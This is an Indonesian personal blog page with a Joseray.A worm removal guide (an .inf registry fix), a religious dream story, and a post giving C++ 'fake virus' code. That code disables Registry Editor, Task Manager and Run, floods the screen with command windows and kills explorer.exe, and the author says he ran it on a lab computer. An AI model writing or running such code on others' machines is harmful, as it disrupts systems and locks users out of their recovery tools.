Menghilangkan Joseray.A

Ehm,,,,sebenarnya ini pengalaman yang gak baru sih,,,
tapi, bagus juga de kayaknya kalo di ceritain..
hehehehe...
begini ceritanya ;
pada suatu hari saya mencoba untuk membuka regedit di suatu komputer di lab...
eh, kok gak bisa y, malah restart! &^%*!@
eng...buka command prompt juga restart! @#^%$
waduh,,ada yang gak bener ni....betul kan, tnyata ada worm yg tertanam di itu kompi....
taunya dari mana??,,soalnya, itu worm pede bgt ngeliatin dirinya dgn nama "Brontok.A"...
eng, pertama sih ngiranya Brontok.A,,,eh, tapi kok nama file "tebar pesonanya" "about.Joseray.A"
kayaknya bukan Brontok.A ni,,,tapi Joseray.A....
langsung aja de ke inti ceritanya,,how to remove Joseray.A???


1.
Restart dulu akh komputernya dan masuk ke safe mode with command prompt
2. Ketik aja explorer.exe di jendela cmd, biar ada jendela explorernya gtu...
3. Buka notepad, copy paste ni script

[Version]

Signature="$Chicago$"

Provider=garyabraham


[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""


[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions

HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Andrian-Pkus

HKLM, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools

HKLM, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableCMD

HKLM, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions

HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Joseray_World

HKU, .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run, Andrian-Pkus

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Repair

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Repair


save dah tu, jadi "repair.inf" (tanpa kutip dua)

4. Kalo udah di save, coba klik kanan tu repair.inf, pilih install
5. Ok, buka regedit akh,,,,buat mastiin aja, udah ke delete apa belum startup-nya??? Kalo belum,
6. Delete value Andrian-Pkus, di HKCU\Software\Microsoft\Windows\CurrentVersion\Run
dan di HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
Joseray_World, di HKLM\Software\Microsoft\Windows\CurrentVersion\Run
7. Keluar dari regedit
8. Buka msconfig, unchecklist value esojray dan smss, jangan langsung di restart yup...
9. Delete file
a. esojray (aplikasi) di C:
b. Jose.ray-3-17 (folder) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
c. Jose.ray-3-18 (folder) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
d. Loc.Mail.Brontok (folder) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
e. OK-SendMail-Jose-ray (folder) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
f. csrss (aplikasi) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
g. inetinfo (aplikasi) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
h. Kosong.Jose.Ray (text document) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
i. lsass (aplikasi) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
j. services (aplikasi) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
k. smss (aplikasi) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
l. winlogon (aplikasi) di C:\Documents and Settings\"Account kamu"\Local Settings\Application Data
m. about.Joseray.A (html) di C:\Documents and Settings\"Account kamu"\My Documents\My Pictures

10. Delete schedule task "AT1"
11. Restart de komputernya
12. Masuk ke mode normal dan selesai!!!!!!

fuih, panjang bgt ya ceritanya.......

ditunggu perbaikannya, caci makinya, dll

thx.
My Jesus
Vaksincom
Pak Hendri (Instruktur saya)
dan yang saya tidak sebutkan
i love u all......


 

Membuat Virus dengan c++

hari ini saya bingung mau ngapain.....
daripada nggak ada kerjaan, mending buat sesuatu yang iseng akh,,,,,,
hihihiihihii.....
nah, karena semester ini saya ngajar c++, jadi sedikit ngerti lah ttg c++.
bcoz of that,
saya coba akh bwt fake virus a.k.a virus boongan dgn borland c++ 5.0.2

mulai de.....
pertama-tama,
saya berdoa dulu, supaya postingan ini jangan dipraktekan di lingkungan sekolah, kampus, dll,,dan
tidak untuk tindakan yang destruktif tapi menjadi pembelajaran semata.....(so wise ya.......) :)

kedua.
buka borland c++ dan ketikkan script yang ada di bawah ini...

#include"windows.h" 
main()
{
//fake virus by : garyabraham.......
//heheheheheeheheeeeee......

//bwt disable registry editor
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disableregistrytools /d 1 /f");

//untuk disable taskmanager
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disabletaskmgr /d 1 /f");

//disable run 
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f"); 

//buat iseng aja, ngeluarin jendela command prompt cukup banyak lah.....
//syntax penyelamat sebenarnya
system("for %d in ( . . . . . . . . . . , , , . , . . , , l , l , ; . , . , . , l , , l , . . , . . , . , . , , , . , . , . . . . . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , ) do start");

//untuk end process explorer.exe
system("Taskkill /f /im explorer.exe");

//selesai de bikin virus nya......
//kamu compile jadi .exe ya.....
//jalankan program.......
} 


ketiga,
saya gunakan komputer lab sebagai korban......
hahahahahahahahaha.........
maafkan aku b51!!....
untung pak Hendri (instruktur saya) baik, murah senyum, tidak sombong, dll....lho kok?#%*#@

keempat,
cari cara bwt benerinnya.......hahahhahahahaahaaaa.......
becanda de...
1. waktu program dijalankan kan dia menyisakan command prompt yang keluarnya banyak tu
2. ketikkan "explorer.exe" (tanpa kutip dua) di situ
3. buka lagi program mentahannya, lalu ganti angka 1 setelah /d dengan 0...
4. selamat mencoba ya......
5. jangan dipakai utk tindakan destruktif, kriminal, pelecehan seksual, dll.

thx.
My Jesus
Pak Hendri (instruktur)
Tomi Poermadi (Teman Ass.Lab di b51)
and mandy more (many more) hehehehe.......
 

PESAN DARI NERAKA

Semalam aku tertidur dan bermimpi...
Didalam mimpiku aku didatangi sebuah "pesan dari neraka"!!!!!
eng....
kucoba membaca pesan yang tersirat di dalamnya..
"Hai sobat,,ini aku sahabatmu...
sekarang aku berada di neraka!!!aku mengirim surat ini kepada mu,,
sebab kamulah yang paling bertanggung jawab atas keberadaanku ini!!!!
"

Setelah membaca nya, aku merasa sangat bersalah dan tidak karuan!!!!
ku coba melanjutkan!!!
"kamu tau tentang Yesus,,Dia adalah penyelamat!!!!!
tapi kenapa, kamu tidak pernah bercerita kepadaku???!!!!
Aku kecewa!!!!!!!
sekarang aku hanya bisa merasakan api neraka yang begitu jahat,,
dan kamu
akan sangat menikmati keindahan surga nanti!!!!
"
Setelah membacanya, aku terbangun dari tidurku....
dan kemudian....
aku berjanji,, mulai sekarang aku akan menceritakan tentang Yesus kepada sahabat2 ku!!!!

semoga cerita di atas dapat memberkati kalian semua.....
GBU....
 
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Gary Abraham's Blog - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger